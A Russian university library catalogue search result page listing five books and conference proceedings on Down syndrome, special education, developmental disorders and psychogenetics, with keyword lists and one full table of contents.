Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

122 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СИНДРОМ ДАУНА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Молодежь, наука, творчество - 2011 [Текст] : IX Межвуз. науч.-практ. конф. студентов и аспирантов (Омск, 17-20 мая 2011 г.) : сб. ст.: в 2 ч. / Ом. гос. ин-т сервиса; под общ. ред. Л. О. Штриплинга. Ч. 2 / дар. Л. О. Штриплинг, 2011. - 217 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ОГИС -- ОМСК -- КОНФЕРЕНЦИЯ -- ТУРИЗМ -- СЕРВИСНАЯ -- ТЕХНОЛОГИЯ -- ГОСТИНИЧНАЯ -- ИНДУСТРИЯ -- ДОМОВЕДЕНИЕ -- ЭКОЛОГИЧЕСКИЙ -- ТУР -- ОМСКАЯ ОБЛАСТЬ -- МУРОМЦЕВО -- ПАЛАТОЧНЫЙ -- ЛАГЕРЬ -- ПОСТРЕЛЯТА -- ПОДРОСТОК -- НЕБЛАГОПОЛУЧНАЯ -- СЕМЬЯ -- РЕАБИЛИТАЦИОННЫЙ -- ОКУНЕВО -- КОМПАНИЯ -- АККОР -- РОССИЙСКИЙ -- РЫНОК -- ОКУНЕВСКИЙ -- КОВЧЕГ -- ГОСТИНИЦА -- ГОСТИНИЧНОЕ -- ХОЗЯЙСТВО -- СОЧИ -- РОССИЯ -- ТУРИСТСКАЯ -- ВЫСТАВКА -- ТУРИСТИЧЕСКАЯ -- УСЛУГА -- БРОНИРОВАНИЕ -- ИНТЕРНЕТ -- РАЗРАБОТКА -- ЭКСКУРСИОННАЯ -- ПРОГРАММА -- СЕВЕРНЫЙ КАВКАЗ -- КАВКАЗ -- ГОРНОЛЫЖНЫЙ -- КУРОРТ -- ЭКСТРЕМАЛЬНЫЙ -- ПЕРСОНАЛ -- УПРАВЛЕНИЕ -- ЭКОНОМИЧЕСКАЯ -- ЭФФЕКТИВНОСТЬ -- КАМЕЛОТ -- SPA-ТУР -- ОМСКИЙ -- ИНДИВИДУАЛИЗАЦИЯ -- СТУДЕНТ -- ПРОФЕССИОНАЛЬНЫЙ -- ИНТЕРЕС -- ТУРМЕНЕДЖЕР -- ФОРМИРОВАНИЕ -- КОММУНИКАЦИОННАЯ -- КОМПЕТЕНЦИЯ -- САМООБРАЗОВАТЕЛЬНАЯ -- ДЕЯТЕЛЬНОСТЬ -- САМООБРАЗОВАНИЕ -- ТУРИСТ -- ГОСТИНИЧНЫЙ -- КОМПЛЕКС -- ПЕРЕСЕЧЕНИЕ -- ГОСУДАРСТВЕННАЯ -- ГРАНИЦА -- РФ -- РОССИЙСКАЯ ФЕДЕРАЦИЯ -- КАЗАХСТАН -- БИЗНЕС -- ТУРИСТСКИЙ -- МАРШРУТ -- ТОПОНИМИЧЕСКИЙ -- АСПЕКТ -- ПРОФЕССИОНАЛЬНОЕ -- СТАНОВЛЕНИЕ -- ОБРАЗОВАНИЕ -- ДВУХУРОВНЕВАЯ -- СИСТЕМА -- ВНУТРЕННИЙ -- ОЛИМПИАДА -- ОБРАЗОВАТЕЛЬНАЯ -- СРЕДА -- КЛИЕНТООРИЕНТИРОВАННЫЙ -- ПОДХОД -- МУЗЕЙ -- ЭТНОГРАФИЧЕСКИЙ -- ХАКАСИЯ -- УСТЬ-СОС -- КУЛЬТУРНО-ПОЗНАВАТЕЛЬНЫЙ -- КУЛЬТУРНЫЙ -- ПОЗНАВАТЕЛЬНЫЙ -- САЙТ -- ОМСКАЯ -- ГОСТИНИЦА -- ИРТЫШ -- ПРОГРАММНОЕ -- ОБЕСПЕЧЕНИЕ -- АВТОМАТИЗАЦИЯ -- БОРОВОЕ -- ПЕШЕХОДНЫЙ -- ПОХОД -- РЕКРЕАЦИОННЫЙ -- СОБЫТИЙНЫЙ -- ЖКХ -- ЖИЛИЩНО-КОММУНАЛЬНОЕ -- ЖИЛИЩНОЕ -- КОММУНАЛЬНОЕ -- ЖИЛОЕ -- ПРОСТРАНСТВО -- ОБУСТРОЙСТВО -- ЭРГОНОМИЧЕСКОЕ -- ТРЕБОВАНИЕ -- СОТРУДНИК -- ОФИС -- УЛУЧШЕНИЕ -- ТРУДОВАЯ -- ТРУД -- ХРОНИЧЕСКОЕ -- УТОМЛЕНИЕ -- ЭМОЦИОНАЛЬНАЯ -- СФЕРА -- ВТОРИЧНАЯ -- ЗАНЯТОСТЬ -- ПОДБОР -- ЮГРОС ТРЭЙД -- НЕТРАДИЦИОННЫЙ -- МЕТОД -- ПРЕДПРИЯТИЕ -- ТРУДОВОЙ -- РЕСУРС -- КАДРОВЫЙ -- РЕЗЕРВ -- ОХРАНА -- БЕЗОПАСНОСТЬ -- ОМСКВОДОКАНАЛ -- МАЛЫЙ -- КРЕДИТОВАНИЕ -- СТРОИТЕЛЬСТВО -- ЗДАНИЕ -- ЭНЕРГОНЕЗАВИСИМОЕ -- ОХРАННАЯ -- ТОРГОВОЕ -- OUTLET -- ОСНОВНОЕ -- СРЕДСТВО -- ОЦЕНКА -- СОСТОЯНИЕ -- ДВИЖЕНИЕ -- ИСПОЛЬЗОВАНИЕ -- ИПОТЕКА -- ИПОТЕЧНОЕ -- ВОЕННОСЛУЖАЩИЙ -- ЖИЛИЩНЫЙ -- ФОНД -- ВОСПРОИЗВОДСТВО -- ЗАРУБЕЖНЫЙ -- ОПЫТ -- ЖИЛЬЕ -- ЦЕНТРАЛИЗОВАННОЕ -- ТЕПЛОСНАБЖЕНИЕ -- ПОКВАРТИРНОЕ -- ЦЕНТРАЛЬНАЯ -- ВЫТЯЖНАЯ -- ВЕНТИЛЯЦИЯ -- ВЕНТИЛЯЦИОННОЕ -- УСТРОЙСТВО -- ПРИТОЧНО-ВЫТЯЖНОЕ -- ПРИТОЧНОЕ -- ВЫТЯЖНОЕ -- ТЕПЛОТА -- УТИЛИЗАЦИЯ -- УМНЫЙ ДОМ -- ДОМ -- ИНДИВИДУАЛЬНОЕ -- МАТЕМАТИКА -- МАТЕМАТИЧЕСКАЯ -- НАУКА -- ИНФОРМАЦИОННАЯ -- ВУЗ -- ТРЕБОВАНИЕ -- СИСТЕМАТИЗАЦИЯ -- КОМПЬЮТЕР -- ЧИСЛЕННЫЙ -- РЕАЛИЗАЦИЯ -- ЧЕЛОВЕК -- МОДЕЛЬ -- ПОВЕДЕНИЕ -- ПРАВОВАЯ -- КУЛЬТУРА -- ВИРТУАЛИЗАЦИЯ -- ТЕРМИНАЛЬНАЯ -- СЕТЬ -- ПОСТРОЕНИЕ -- ПРОИЗВОДИТЕЛЬНОСТЬ -- ФОНДООТДАЧА -- ДИНАМИКА -- ЭКОНОМИЧЕСКИЙ -- РОСТ -- ЗАТРАТА -- ПРИБЫЛЬ -- МОДЕЛИРОВАНИЕ -- ЛОКАЛЬНАЯ -- ВЫЧИСЛИТЕЛЬНАЯ -- ИМИТАЦИОННОЕ -- ЯЗЫК -- GPSS -- КОРПОРАТИВНЫЙ -- МЕДИЦИНСКОЕ -- УЧРЕЖДЕНИЕ -- ИМИДЖ -- МАРКОВСКИЙ -- ПРОЦЕСС -- PERL -- СУБЪЕКТ -- РЕФЛЕКСИВНАЯ -- ИГРА -- ЗАДАНИЕ -- ТЕЛЕОБРАБОТКА -- РАСЧЕТ -- WEB-ПРИЛОЖЕНИЕ -- UML -- ИННОВАЦИЯ -- ЭКСПЕРТНАЯ -- АНАЛИТИК -- ЗДОРОВЬЕ -- СПОРТСМЕН -- АСПИРАНТУРА -- НАУЧНОЕ -- ИССЛЕДОВАНИЕ -- КАДРЫ -- ПОДГОТОВКА -- ВЫСШАЯ -- КВАЛИФИКАЦИЯ -- МИРОВОЗЗРЕНЧЕСКИЙ -- СОЦИО-ГУМАНИТАРНЫЙ -- ГУМАНИТАРНЫЙ -- АСПЕКТ -- СОТОВЫЙ -- ТЕЛЕФОН -- ЧЕЛОВЕК -- ЧЕЛОВЕЧЕСКАЯ -- ЖИЗНЬ -- ФАНАТСКАЯ -- ФАНАТ -- РАЗРАСТАНИЕ -- ПРАВОСЛАВНОЕ -- ПОНИМАНИЕ -- ЭТИЧЕСКАЯ -- ПРОБЛЕМА -- ЭТИКА -- РЕКЛАМА -- ФУТБОЛЬНЫЙ -- ФУТБОЛ -- ВЕЗЕНИЕ -- ФЕНОМЕН -- МАКИАВЕЛЛИ -- ПОЛИТИЧЕСКИЙ -- РЕАЛИЗМ -- РАБОТА -- ПОИСК -- ДНЕВНАЯ -- ФОРМА -- ОБУЧЕНИЕ -- ИГРОМАНИЯ -- РЕБЕНОК -- ДОШКОЛЬНИК -- ШКОЛЬНИК -- ДИАГНОСТИКА -- РЕПРЕЗЕНТАЦИЯ -- НЕВЕРБАЛЬНОЕ -- РОССИЯ -- КИТАЙ -- НЕРЧЕНСКИЙ -- ДОГОВОР -- АЛБАЗИН -- КОНЦЕПТ -- ГЕНДЕР -- СИБИРСКАЯ -- ЖЕНЩИНА -- ПОЛОЖЕНИЕ -- ФОНД -- СОВЕТ -- ДЕПУТАТ -- ИНФОРМАТИВНАЯ -- ВОЗМОЖНОСТЬ -- ТОРГОВЫЙ ДОМ -- СИБИРСКИЙ -- СОЦИУМ -- ИНТЕРНЕТ-РЕСУРС -- РЕСУРС -- ОБЗОР -- ВОВ -- ВЕЛИКАЯ ОТЕЧЕСТВЕННАЯ ВОЙНА -- ОТЕЧЕСТВЕННАЯ -- ВОЙНА -- НАРОД -- ПОДВИГ -- АКМОЛИНСК -- МВД -- АРХИВ -- МИГРАНТ -- ВЫНУЖДЕННЫЙ -- ПЕРЕСЕЛЕНЕЦ -- САНКТ-ПЕТЕРБУРГ -- ПЕТЕРБУРГ -- МОЛОДЕЖНЫЙ -- СОЦИАЛЬНЫЙ -- СПЕКТАКЛЬ -- ЭПИДЕМИЯ -- ВИЧ -- СПИД -- ФОРМИРОВАНИЕ -- ТОЛЕРАНТНОСТЬ -- МОЛОДЕЖЬ -- УРОВНЕВАЯ -- ПОДГОТОВКА -- КАДРЫ -- АВТОРСКОЕ -- ПРАВО -- ОХРАНА -- ДОБРОСОВЕСТНОСТЬ -- ДОКАЗЫВАНИЕ -- ЧАСТНОЕ -- ОБВИНЕНИЕ -- ТОЧКА -- ПРЯМАЯ -- КРИВАЯ -- ПЛОСКОСТЬ -- ДИЗАЙН -- КОСТЮМ -- ОДЕЖДА -- ИЗОБРАЗИТЕЛЬНОЕ -- ИСКУССТВО -- ВДОХНОВЕНИЕ -- ЕСТЕСТВОЗНАНИЕ -- СВЕТ -- КОРПУСКУЛЯРНО-ВОЛНОВАЯ -- КОРПУСКУЛЯРНАЯ -- ВОЛНОВАЯ -- ПРИРОДА -- ЗРИТЕЛЬНАЯ -- ИЛЛЮЗИЯ -- ОВОЩ -- НИТРАТ -- ПОЧВА -- ПЛОДОРОДИЕ -- РАСТЕНИЕ -- ЗАГРЯЗНЕНИЕ -- ОКРУЖАЮЩАЯ -- ХИМИЧЕСКОЕ -- ВЕЩЕСТВО -- ХИМЧИСТКА -- ПРИМЕНЕНИЕ -- МАТЕРИАЛ -- РАСКРОЙ -- СТУДЕНТ -- СВОЙСТВО -- КОСМИЧЕСКИЙ -- РОТОРНЫЙ -- ГЕНЕРАТОР -- ВОЗДУХ -- КОНДИЦИОНИРОВАНИЕ -- ГЕТЕРОСТРУКТУРА -- ГАЗОЧУВСТВИТЕЛЬНОЕ -- ДОЗИМЕТРИЧЕСКИЙ -- КОНТРОЛЬ -- ТОКАРНЫЙ -- СТАНОК -- РЕЗАНИЕ -- ШУМ -- ЛУНА -- ИССЛЕДОВАНИЕ -- ГАСТРОЭЗОФАГЕЛЬНАЯ -- РЕФЛЮКСНАЯ -- БОЛЕЗНЬ -- ЖИЗНЕДЕЯТЕЛЬНОСТЬ -- ЭКОЛОГИЯ -- ПРОМЫШЛЕННАЯ -- ЗАПРАВОЧНАЯ -- ОПЕРАЦИЯ -- ТЕХНОГЕННОЕ -- ВОЗДЕЙСТВИЕ -- ПРИДОРОЖНАЯ -- ТЕРРИТОРИЯ -- СНЕЖНЫЙ -- ПОКРОВ -- ЭНЕРГИЯ -- АЛЬТЕРНАТИВНЫЙ -- ИСТОЧНИК -- АТМОСФЕРА -- СВЕРХНОРМАТИВНОЕ -- СЕРТИФИКАТ -- ИСО -- СЕРТИФИКАЦИЯ -- СОРБЦИОННОЕ -- ОЧИСТКА -- СТОЧНАЯ -- ВОДА -- НЕФТЯНОЕ -- НЕФТЕПРОДУКТ -- ВЫБРОС -- ПРОДУКТ -- ПАР -- РЕЗЕРВУАР -- ПРОГРАММА 1 С: ПРЕДПРИЯТИЕ 8.2 -- РАСЧЕТ -- ПЛАТЕЖ -- НЕГАТИВНОЕ -- ВОЗДЕЙСТВИЕ -- РТУТЬ -- СБОР -- УТИЛИЗАЦИЯ -- НАНОТЕХНОЛОГИЯ -- ГРУНТ -- КАПСУЛИРОВАНИЕ -- ПРИРОДООХРАННАЯ -- ЗАДАЧА -- РУССКО-ПОЛЯНСКОЕ АТП -- ОМСКИЙ АЭРОПОРТ -- СТРОИТЕЛЬНАЯ ФИРМА "ТРЕСТ-5" -- ТРЕСТ-5 -- НЕФТЕХИМИЧЕСКОЕ -- ПРЕДПРИЯТИЕ -- ВОДОСНАБЖЕНИЕ -- НЕФТЕШЛАМ -- ЭКОЛОГИЧЕСКАЯ -- ДОКУМЕНТАЦИЯ -- ДЕТИ -- ВОСПИТАНИЕ -- ОБУЧЕНИЕ -- ОБРАЗОВАНИЕ -- СПЕЦИАЛЬНОЕ -- КОРРЕКЦИОННОЕ -- СИНДРОМ ДАУНА -- ДАУН -- СЛУХОВОЕ -- ВОСПРИЯТИЕ -- ВНИМАНИЕ -- УМСТВЕННАЯ -- ОТСТАЛОСТЬ -- РЕЧЬ -- НЕДОРАЗВИТИЕ -- РЕЧЕВАЯ -- ПАТОЛОГИЯ -- АУТИЗМ -- ДВИГАТЕЛЬНОЕ -- НАРУШЕНИЕ -- ЦЕРЕБРАЛЬНЫЙ -- ПАРАЛИЧ -- КРЕАТИВНОСТЬ -- ПОЛОВОЕ -- ВОСПИТАНИЕ -- ПЕДАГОГИКА -- МЕТОДИКА -- ПРЕПОДАВАНИЕ -- ДИСЦИПЛИНА -- МАТЕМАТИКА -- ГЕОМЕТРИЯ -- СТЕРЕОМЕТРИЯ -- ПЛАНИМЕТРИЯ -- БАКАЛАВР -- ПРОДУКЦИЯ -- КАЧЕСТВО -- ГОЛОВНОЙ -- УБОР -- ЧУЛОК -- НОСОК -- ЮВЕЛИРНОЕ -- ИЗДЕЛИЕ
Держатели документа (Информация об экземплярах) 
Полный текст
2. 
Если у малыша синдром Дауна : методические рекомендации для родителей / сост. А. Ю. Арутюнян [и др.], 2009. - 52 с.
Держатели документа (Информация об экземплярах) 
3. 
Психолого-педагогическая и медико-социальная поддержка лиц с проблемами в развитии : материалы Всероссийской научно-практической конференции (Бийск, 15-16 мая 2008 г.) : в 2-х ч.Ч. 1 / отв. ред. Н. А. Першина ; ред. Н. Б. Шевченко [и др.], 2008. - 398 с.
Ключевые слова 
повышение квалификации учителей-логопедов -- дети с особыми образовательными потребностями -- эмоциональное выгорание учителей специальных школ -- методика преподавания географии -- система монтессори м. -- синдром дауна -- умственная отсталость -- 1 год -- 2 года -- 3 года -- кризисная жизненная ситуация -- онкологические больные -- спид -- девиантное поведение -- суицид -- профилактика суицида -- детский суицид -- здоровье учащихся -- здоровье учителя -- подростковый суицид -- юношеский суицид -- социализация дезадаптированных подростков -- эмоциональное благополучие -- психическое здоровье -- дети-сироты -- детский аутизм -- детский церебральный паралич -- урок математики -- труды
Оглавление 
  • Арутюнян, Анна Юрьевна. Подготовка специалистов-дефектологов в России / А. Ю. Арутюнян [и др.]. - с.11
    Другие авторы: Першина Н. А., Горбатая Е. А., Денисенко О. Н.
  • Басаргина, Л. В. Основные проблемы организации повышения квалификации учителей-логопедов / Л. В. Басаргина. - с.15
  • Башмакова, С. Б. Система работы педагога в процессе обучения школьников с особыми образовательными потребностями / С. Б. Башмакова. - с.19
  • Бородина, А. В. Развитие эмпатии к детям с особыми образовательными потребностями у будущих педагогов / А. В. Бородина. - с.23
  • Веремей, А. Г. Особенности профессиональной подготовки студентов к работе с детьми с особыми образовательными потребностями / А. Г. Веремей. - с.27
  • Васильева, И. П. К проблеме определения профессиональной компетентности специальных психологов / И. П. Васильева. - с.30
  • Ганцева, О. И. О некоторых особенностях профессиональной подготовки социальных работников в колледжах Германии / О. И. Ганцева. - с.35
  • Гришанова, Е. А. Подготовка специалистов для работы с детьми с разными образовательными потребностями через работу стажерской площадки / Е. А. Гришанова. - с.38
  • Гусева, Татьяна Артуровна. Диагностика стилей познавательной активности в обучении специальных психологов / Т. А. Гусева, К. Я. Вейберт. - с.41
  • Коновалова, Е. Ю. Компетентностный подход к подготовке педагогов к обучению на дому детей с ограниченными возможностями здоровья / Е. Ю. Коновалова. - с.48
  • Ольхина, Е. А. Актуальные проблемы эмоционального выгорания учителей специальных (коррекционных) школ / Е. А. Ольхина. - с.51
  • Пилипчук, Л. С. Проблема эмоционального выгорания в деятельности воспитателей и педагогов-дефектологов специализированных дошкольных учреждений / Л. С. Пилипчук. - с.54
  • Речицкая, Екатерина Григорьевна. Инновационные подходы к подготовке дефектологов / Е. Г. Речицкая. - с.58
  • Самофалова, А. А. К вопросу о готовности студентов первого курса к обучению в Институте специальной педагогики / А. А. Самофалова. - с.60
  • Сетько, Е. В. Организация и создание условий для профессионального роста педагога как средство совершенствования психолого-педагогической поддержки учащихся в учебно-воспитательном процессе / Е. В. Сетько. - с.62
  • Соломина, Е. Н. Система контроля знаний студентов при изучении курса "Методика преподавания географии" в специальной (коррекционной) школе VIII вида / Е. Н. Соломина. - с.57
  • Султанова, Р. Ф. Саморегуляция как способ формирования стрессоустойчивости педагогов коррекционных учреждений / Р. Ф. Султанова, Н. И. Трубникова. - с.70
  • Бердникова, З. В. Реализация социального аспекта индивидуальной программы реабилитации детей-инвалидов / З. В. Бердникова. - с.73
  • Буянова, Г. Н. Ученическое самоуправление в школах для детей с нарушениями зрения / Г. Н. Буянова. - с.76
  • Важнова, Л. В. Осуществление комплексного подхода в организации коррекционно-развивающей работы дошкольного образовательного учреждения / Л. В. Важнова. - с.83
  • Валикова, В. Д. Психологическое здоровье ученика и учителя - основа их успешного взаимодействия / В. Д. Валикова. - с.86
  • Горелкина, О. В. Интеграция и социализация лиц с особыми образовательными потребностями средствами дополнительного образования / О. В. Горелкина. - с.90
  • Елисова, Л. В. Организация воспитательно-образовательного процесса в группе кратковременного пребывания для детей со специальными потребностями с использованием технологий М. Монтессори / Л. В. Елисова, О. П. Мочалова. - с.93
  • Иванова, Т. В. Интегрированные уроки как условие организации продуктивного обучения / Т. В. Иванова. - с.96
  • Исаева, Марина Борисовна. Подходы к реализации как категории образования / М. Б. Исаева. - с.100
  • Карева, И. Г. Некоторые аспекты обучения математике дошкольников с проблемами развития / И. Г. Карева. - с.105
  • Колпакова, Н. В. Профессиональное взаимодействие психолога и педагогов специальных (коррекционных) образовательных учреждений / Н. В. Колпакова. - с.109
  • Космачева, Н. К. Проектная деятельность как средство социализации молодежи с ограниченными возможностями здоровья / Н. К. Космачева, Г. Г. Горбатовская, Т. Л. Черемисина. - с.112
  • Можан, Н. И. Становление и развитие социально-педагогической работы с детьми с ограниченными возможностями в Тарском районе Омской области / Н. И. Можан. - с.115
  • Мялькин, В. Н. Особенности обучения токарному делу учащихся с ограниченными физическими возможностями / В. Н. Мялькин. - с.119
  • Новолодская, Елена Геннадьевна. Тематическая неделя в коррекционной школе "Школа цветного настроения" / Е. Г. Новолодская. - с.122
  • Ольгин, И. И. Актуальность внедрения адаптивной физической культуры в образовательные учреждения / И. И. Ольгин. - с.127
  • Соловьева, С. В. Организация межведомственного взаимодействия в процессе комплексной реабилитации детей и подростков с ограниченными возможностями здоровья / С. В. Соловьева. - с.130
  • Сухорукова, Л. И. Информированность и отношение населения г. Бийска к проблеме людей с умственной отсталостью, синдромом Дауна / Л. И. Сухорукова, Н. А. Першина. - с.140
  • Талипова, О. А. Влияние психологических особенностей личности на политическую активность молодежи с ограниченными возможностями здоровья / О. А. Талипова, А. П. Гасилина. - с.145
  • Тюканов, В. Л. Основы адаптивной физической культуры / В. Л. Тюканов. - с.149
  • Тушева, Е. С. Интегрированное обучение детей с ограниченными возможностями развития / Е. С. Тушева. - с.153
  • Упоров, Д. В. Психолого-медико-педагогическое и нормативно-правовое сопровождение процесса инклюзивного профессионального образования инвалидов / Д. В. Упоров. - с.158
  • Упоров, Д. В. Организация и содержание профориентационной работы с детьми, имеющими особые образовательные потребности / Д. В. Упоров. - с.164
  • Ходакова, М. Н. Состояние детской инвалидности в г. Бийске / М. Н. Ходакова, Н. М. Медведева. - с.172
  • Шмакова, М. Е. Дефектологическое сопровождение учащихся с особыми образовательными потребностями в системе начального профессионального образования / М. Е. Шмакова. - с.174
  • Шуваева, В. Модель взаимодействия педагога-психолога и учителя-логопеда в условиях общеобразовательной школы / В. Шуваева. - с.177
  • Шурдукалов, В. Н. Развитие системы специального образования Красноярского края / В. Н. Шурдукалов. - с.181
  • Богданова, О. Ф. Организация работы с семьями, имеющими детей с ограниченными возможностями / О. Ф. Богданова. - с.185
  • Вахрушева, А. С. Факторы, обуславливающие низкую готовность родителей к жизни с ребенком, имеющим отклонения в развитии / А. С. Вахрушева. - с.189
  • Иванова, О. И. Круглый стол как форма работы с семьей / О. И. Иванова. - с.191
  • Клиновицкая, Л. А. Опыт проведения работы с детьми-инвалидами и их семьями в отделении реабилитации / Л. А. Клиновицкая. - с.193
  • Крехтунова, М. В. Проблемы организации родителей, имеющих детей с ограниченными возможностями здоровья / М. В. Крехтунова. - с.200
  • Нецветаева, М. Л. Ребенок с особыми потребностями в семье, его сопровождение / М. Л. Нецветаева. - с.204
  • Сергеева, И. В. Социально-психологические проблемы семьи, воспитывающей ребенка с отклонениями в развитии / И. В. Сергеева. - с.207
  • Бондарева, Л. А. Создание Монтессори-групп "Вместе с мамами" как условие раннего патронажа детей от 1 до 3 лет с проблемами развития / Л. А. Бондарева. - с.211
  • Дудьев, Василий Петрович. Комплексно-системный подход к профилактике, выявлению и коррекции отклонений психомотоного развития у детей раннего возраста с перинатальной патологией центральной нервной системы / В. П. Дудьев. - с.217
  • Мироненко, С. Н. Педагогическая реабилитация детей раннего возраста в условиях Дома ребенка / С. Н. Мироненко, Н. П. Сапцина. - с.225
  • Телицына, Л. В. влияние коррекционно-развивающей программы на снижение агрессии и ослабление негативных эмоций у детей раннего возраста в условиях Дома ребенка / Л. В. Телицына. - с.229
  • Гога, О. М. Программа социально-психологической помощи семьям, оказавшимся в кризисной ситуации и имеющим ребенка-инвалида / О. М. Гога. - с.233
  • Жукова, А. Н. Особенности переживания надежды людьми, находящимися в кризисном состоянии / А. Н. Жукова, Я. Г. Казанцева. - с.241
  • Кутнякова, Ю. Г. Психологические особенности идентичности у людей, находящихся в кризисной жизненной ситуации / Ю. Г. Кутнякова, Я. Г. Казанцева. - с.244
  • Мельникова, Е. А. Социально-психологические аспекты сопровождения ВИЧ-положительных / Е. А. Мельникова. - с.246
  • Гонохова, Тамара Алексеевна. К вопросу об условиях формирования девиантного поведения / Т. А. Гонохова. - с.250
  • Гусева, Татьяна Артуровна. Система мероприятий профилактики суицида среди детей, подростков и юношей / Т. А. Гусева, Т. А. Кречетова. - с.258
  • Дмитриева, Н. В. Психологические проявления пограничной личностной организации / Н. В. Дмитриева, Ц. П. Короленко. - с.262
  • Короленко, Цезарь Петрович. Психологическое состояние диссоциативной идентичности / Ц. П. Короленко, Н. В. Дмитриева. - с.271
  • Кузнецова, Любовь Николаевна. Условия социализации дезадаптированных подростков / Л. Н. Кузнецова. - с.280
  • Манузина, Елена Борисовна. Педагогическая поддержка как условие коррекции социальной дезадаптации детей и подростков / Е. Б. Манузина. - с.286
  • Терентьева, Нина Павловна. Психолого-педагогическая коррекция защитного функционирования у подростков с проблемами развития / Н. П. Терентьева. - с.291
  • Тюрикова, К. С. Сказкотерапия как метод снижения агрессивности у младших подростков / К. С. Тюрикова, Н. А. Першина. - с.295
  • Фебенчукова, Анна Васильевна. Психологическая ригидность в контексте синергетического подхода / А. В. Фебенчукова. - с.299
  • Шагина, С. А. Социально-психологическая профилактика девиантного поведения подростков / С. А. Шагина. - с.302
  • Алмазова, О. В. Работа специального психолога в условиях дома ребенка / О. В. Алмазова, В. И. Коровина. - с.306
  • Алякритская, Г. О. Эмоциональное благополучие - залог психического здоровья / Г. О. Алякритская. - с.310
  • Дубовицкая, Н. В. Развитие личностной культуры у детей, оставшихся без попечения родителей / Н. В. Дубовицкая, В. А. Пяткова, В. И. Белоусова. - с.313
  • Дубовицкая, Н. В. Жизнеустойчивость воспитанниц женской гимназии-интерната / Н. В. Дубовицкая, О. А. Милинис, П. В. Бурдуковская. - с.317
  • Мокроусова, О. Б. Формирование здорового образа жизни в условиях детского дома / О. Б. Мокроусова, Е. В. Никушкина, Н. В. Никушкина. - с.321
  • Никушкина, Е. В. Организация деятельности КГОУ "Бийский детский дом №3" в условиях развития института замещающих семей / Е. В. Никушкина, Н. В. Никушкина, И. А. Береза. - с.325
  • Опенышева, Т. В. Подготовка умственно отсталых детей-сирот и детей, оставшихся без попечения родителей к самостоятельной жизни / Т. В. Опенышева. - с.328
  • Шабалина, Л. Ю. Продуктивная деятельность педагога - путь к успешной социализации ребенка / Л. Ю. Шабалина. - с.333
  • Якимова, Е. Д. Социализация детей 2-го и 3-го года жизни по методу Марии Монтессори в условиях Бийского Дома ребенка / Е. Д. Якимова. - с.337
  • Алмазова, О. В. Игротерапия в работе с аутичными детьми, имеющими выраженные нарушения в коммуникативно-аффективной и когнитивной сферах / О. В. Алмазова, Ю. В. Бессмертная. - с.343
  • Бессмертная, Ю. В. Развитие коммуникативных способностей у аутичных детей, имеющих выраженные нарушения в коммуникативно-аффективной и когнитивной сферах / Ю. В. Бессмертная, О. В. Алмазова. - с.347
  • Богатова, Т. А. Проблемы общения ребенка с РДА / Т. А. Богатова. - с.351
  • Жаркова, Л. В. Мой волшебный ребенок / Л. В. Жаркова. - с.353
  • Жулдыбина, А. А. Родители и аутичный ребенок / А. А. Жулдыбина, О. И. Нагайцева. - с.354
  • Запрягаева, Ю. С. Формирование "учебного поведения", как основного этапа подготовки ребенка с ранним детским аутизмом к школьному обучению / Ю. С. Запрягаева. - с.357
  • Керре, И. О. Организация работы по социализации детей дошкольного возраста с ранним детским аутизмом / И. О. Керре. - с.360
  • Косова, Н. Особенности эмоционально-волевой сферы детей с РДА / Н. Косова. - с.365
  • Кузнецова, Н. В. Особый ребенок в социуме / Н. В. Кузнецова. - с.368
  • Соколова, А. Н. "Я хочу, чтобы меня поняли..." / А. Н. Соколова. - с.370
  • Чуешева, Н. А. Возможности и проблемы интегрированного обучения аутичных детей дошкольного возраста / Н. А. Чуешева. - с.372
  • Шипунова, М. Н. Социализация детей с расстройствами аутического спектра средствами музыки / М. Н. Шипунова. - с.376
  • Воронова, О. М. Развитие творческих способностей у детей младшего школьного возраста с ДЦП / О. М. Воронова, Н. Б. Шевченко. - с.382
  • Малкова, Н. Н. Медико-экологические и социальные проблемы адаптации детей с поражением ДЦП / Н. Н. Малкова, З. Н. Бесчастнова, И. Н. Басова. - с.385
  • Мамаева, А. В. Опора на различные уровни организации функции в логопедической работе с детьми, имеющими множественные нарушения в развитии на фоне церебрального паралича / А. В. Мамаева. - с.389
  • Трусова, Г. М. Методы социализации школьников с нарушениями опорно-двигательного аппарата, реализуемые на уроках математики / Г. М. Трусова. - с.393
Держатели документа (Информация об экземплярах) 
4. 
Равич-Щербо, Инна Владимировна. Психогенетика : учебник для вузов по специальности "Психология" / И. В. Равич-Щербо, Т. М. Марютина, Е. Л. Григоренко ; ред.: И. В. Равич-Щербо, И. И. Полетаева, 2008. - 448 с.
Ключевые слова 
развитие психики -- современная генетика -- генотип -- фенотип -- ген -- мутации -- аллель -- хромосомы -- деление клетки -- кариотип -- классические законы наследуемости -- законы менделя -- неменделевская генетика -- хромосомные аберрации -- синдром дауна -- цветовая слепота -- импринтинг -- онкологические заболевания -- мышечная дистрофия -- днк -- наследственность -- нуклеиновые кислоты -- биохимический код наследственности -- изменчивость -- динамика генов в популяции -- влияние среды -- генотип-среда -- методы психогенетики -- генеалогический метод -- метод приемных детей -- метод близнецов -- статистические методы психогенетики -- интеллект -- память -- внимание -- темперамент -- темперамент детей первого года жизни -- темперамент взрослых -- асоциальное поведение -- движение -- сложные поведенческие навыки -- двигательные тесты -- генетическая психофизиология -- генетика мозга -- электроэнцифалограмма -- биоэлектрическая активность мозга -- вегетативные реакции -- функциональная ассиметрия -- леворукость -- возрастная психогенетика -- генетика развития -- возрастная генетическая психофизиология -- психический дизонтогенез -- аутизм -- синдром дефицита внимания -- гиперактивность -- неспособность к обучению -- дислексия
Держатели документа (Информация об экземплярах) 
5. 
Атраментова, Любовь Алексеевна. Введение в психогенетику : учебное пособие для вузов / Л. А. Атраментова, О. В. Филипцова, 20082008. - 472 с.
Ключевые слова 
